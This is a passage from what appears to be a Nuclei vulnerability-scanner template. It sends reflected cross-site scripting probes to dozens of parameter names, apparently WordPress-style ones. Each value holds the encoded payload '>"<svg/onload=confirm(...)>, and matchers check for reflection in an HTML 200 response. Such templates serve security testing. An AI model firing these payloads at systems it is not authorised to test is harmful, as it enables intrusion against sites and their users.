ame=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rename%27%29%3E&mail=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mail%27%29%3E&term=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-term%27%29%3E"
- "{{BaseURL}}/?tab=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tab%27%29%3E&domain=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-domain%27%29%3E&show=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-show%27%29%3E&submit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-submit%27%29%3E&move=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-move%27%29%3E&userid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-userid%27%29%3E&oitar=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oitar%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-key%27%29%3E&description=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-description%27%29%3E&user=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user%27%29%3E&active=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-active%27%29%3E&clone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-clone%27%29%3E&success=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-success%27%29%3E&slug=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-slug%27%29%3E"
- "{{BaseURL}}/?widget=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget%27%29%3E&height=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-height%27%29%3E&screen=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-screen%27%29%3E&pass2=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass2%27%29%3E&redirect_to=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-redirect_to%27%29%3E&items=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-items%27%29%3E&string=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-string%27%29%3E&hidden=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hidden%27%29%3E&f=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-f%27%29%3E&step=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-step%27%29%3E&role=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-role%27%29%3E&preview_nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview_nonce%27%29%3E&date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-date%27%29%3E&event=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-event%27%29%3E"
- "{{BaseURL}}/?num=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-num%27%29%3E&drop=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-drop%27%29%3E&g-recaptcha-response=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-g-recaptcha-response%27%29%3E&field_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-field_id%27%29%3E&user_email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_email%27%29%3E&alias=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-alias%27%29%3E&ref=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ref%27%29%3E&save=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-save%27%29%3E&enabled=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-enabled%27%29%3E&year=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-year%27%29%3E&checked=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-checked%27%29%3E&post_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_ID%27%29%3E&files=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-files%27%29%3E&text-color=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-text-color%27%29%3E"
- "{{BaseURL}}/?admin_email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin_email%27%29%3E&code=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-code%27%29%3E&dump=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dump%27%29%3E&item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-item%27%29%3E&timezone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timezone%27%29%3E&blog_public=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-blog_public%27%29%3E&add=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-add%27%29%3E&enable=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-enable%27%29%3E&customized=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-customized%27%29%3E&admin_password=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin_password%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-keywords%27%29%3E&timestamp=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timestamp%27%29%3E&label=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-label%27%29%3E&g=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-g%27%29%3E"
- "{{BaseURL}}/?location=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-location%27%29%3E&link_url=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link_url%27%29%3E&post_mime_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_mime_type%27%29%3E&uid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-uid%27%29%3E&host=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-host%27%29%3E&cmd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cmd%27%29%3E&link_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link_id%27%29%3E&reset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reset%27%29%3E&nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-nonce%27%29%3E&username=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-username%27%29%3E&site=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-site%27%29%3E&do=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-do%27%29%3E&email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-email%27%29%3E"
host-redirects: true
max-redirects: 1
matchers-condition: and
matchers:
- type: word
part: body
condition: or
words:
- "'>\"<svg/onload=confirm('xss-"
- type: word
part: header
words:
- "text/html"
- type: word
part: body
condition: or
negative: true
words:
- "<title>Access Denied</title>"
- "You don't have permission to access"
- type: status
status:
- 200
# digest: 4b0a00483046022100f730f2f209293a1911ccc03bf9b5332ab3fa26b3b1729f4383fdc50e8ca4c65b022100b6aca03b8aa5484d40163931b4ffacf9b6ef59efd19dfe1922d81d79a6748852:922c64590222798bb761d5b6d8e72950